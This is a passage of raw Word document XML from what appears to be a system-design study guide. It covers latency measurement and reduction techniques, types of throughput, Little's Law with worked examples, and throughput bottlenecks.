        <w:t xml:space="preserve">  Sum reveals where time is spent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6618DA86" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always measure at the CLIENT level</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — that's what the user experiences. Server-side metrics miss network delays, load balancer queuing, and connection setup time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62843067" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Measurement tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441C493" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1427"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed tracing (Jaeger, Zipkin, OpenTelemetry):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Per-request breakdown across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1EF71E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1427"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Percentile histograms (Prometheus, HdrHistogram):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Track latency distribution over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB312F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1427"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real User Monitoring (RUM):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Actual user-perceived latency from their browser/device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9AB881" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.6 Latency Reduction Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5244C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Caching (move data closer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E6620" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D50D6D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Before: App → Network (5ms) → Database (15ms) → Network (5ms) = 25ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E70EF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>After:  App → Local cache (0.1ms) = 0.1ms (250x improvement on hit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F6CA5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Reduce round trips (batching, pipelining):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707DE65" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB841C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Before: 10 sequential requests × 5ms = 50ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D380196" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>After:  1 batched request with 10 items × 5ms = 5ms (10x improvement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1A20C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Parallelism (concurrent requests):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD275EF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440327EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Before: Service A (20ms) → then Service B (15ms) → then Service C (10ms) = 45ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F30E5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>After:  Service A, B, C in parallel → max(20, 15, 10) = 20ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA3A8D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Geographic proximity (CDN, edge computing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74903BC7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C524A30" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Before: User (Tokyo) → Origin (Virginia) = 200ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4E7E1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>After:  User (Tokyo) → Edge (Tokyo) = 5ms RTT (40x improvement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7097C6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Connection reuse (pooling, keep-alive):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B7C7E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363C763" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Before: TCP handshake (1 RTT) + TLS (1 RTT) + Request (1 RTT) = 3 RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E50418" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>After:  Request on existing connection = 1 RTT (3x improvement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDAF28C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Async processing (don't wait for non-critical work):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397B8ED" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9E54A8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Before: Handle request + send email + update analytics + respond = 50ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2294D6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>After:  Handle request + queue email + queue analytics + respond = 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4AD7B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">        (email and analytics processed asynchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76703C6B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Protocol optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACAD4EC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62574BE8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>HTTP/1.1 → HTTP/2 (multiplexing, header compression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07EBE1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>TCP → QUIC (0-RTT, no HOL blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF10675" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>JSON → Protobuf (faster parsing, smaller payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359189AD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="7476AFA3">
          <v:rect id="_x0000_i5104" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B7D27" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Throughput — In Depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD09B2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Types of Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9EB47" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request throughput (operations per second):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1653AEC7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364D3AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>QPS (Queries Per Second): database queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E193CFB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>RPS (Requests Per Second): HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59455EAC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>TPS (Transactions Per Second): completed transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554DBF21" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>OPS (Operations Per Second): generic operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AA3C3E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data throughput (bytes per second):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D5D589" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616DDFC1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network: Gbps, Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DDA09" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Disk: MB/s, GB/s, IOPS (I/O Operations Per Second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D126CD4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Memory: GB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5C786" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Message queue: messages/sec, MB/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28243699" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User throughput (concurrent users):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F5A09" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3DC590" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Concurrent users: users simultaneously using the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD10B4B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Active sessions: sessions with activity in last N minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AAF7E3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>DAU/MAU: Daily/Monthly Active Users (capacity planning metric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F4AFC8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Throughput Formulas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24087036" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Little's Law (fundamental relationship):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C59876" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176E6B2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = λ × W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D1001" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7DDBF24B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = average number of requests in the system (in-flight)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB11B7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>λ = throughput (arrival rate = completion rate at steady state)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A139E07" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>W = average latency (time each request spends in system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA258D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rearranged:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083647CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D89AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Throughput = Concurrency / Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76474B2C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>λ = L / W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281BBFF6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA00646" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D9753" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>A server handles requests with 20ms average latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B433A92" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>It can handle 100 concurrent requests (100 threads/goroutines).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AD0B4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="3E953EF7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput = 100 / 0.020s = 5,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D5EB2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7646D21D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>To handle 10,000 RPS at 20ms latency: need 200 concurrent workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F7A1B1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>To handle 10,000 RPS with 50 workers: need latency ≤ 5ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5802C037" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Little's Law implications for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94F1AB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>To increase throughput, you have three levers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79081857" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Increase concurrency (L):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> More threads, more instances, more parallel processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469ABF1C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decrease latency (W):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Optimize the request path (caching, fewer I/O calls, faster algorithms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A2789A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Both simultaneously:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Scale out AND optimize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F98736" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Throughput Bottlenecks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4DF3D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every system has a bottleneck — the component that limits overall throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4D89D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E6D462" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Request flow:  Load Balancer → App Server → Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E62CE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Capacity:      100K RPS        50K RPS       10K RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1634F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                                              ↑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DBC2D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                                        BOTTLENECK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CD7BBA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
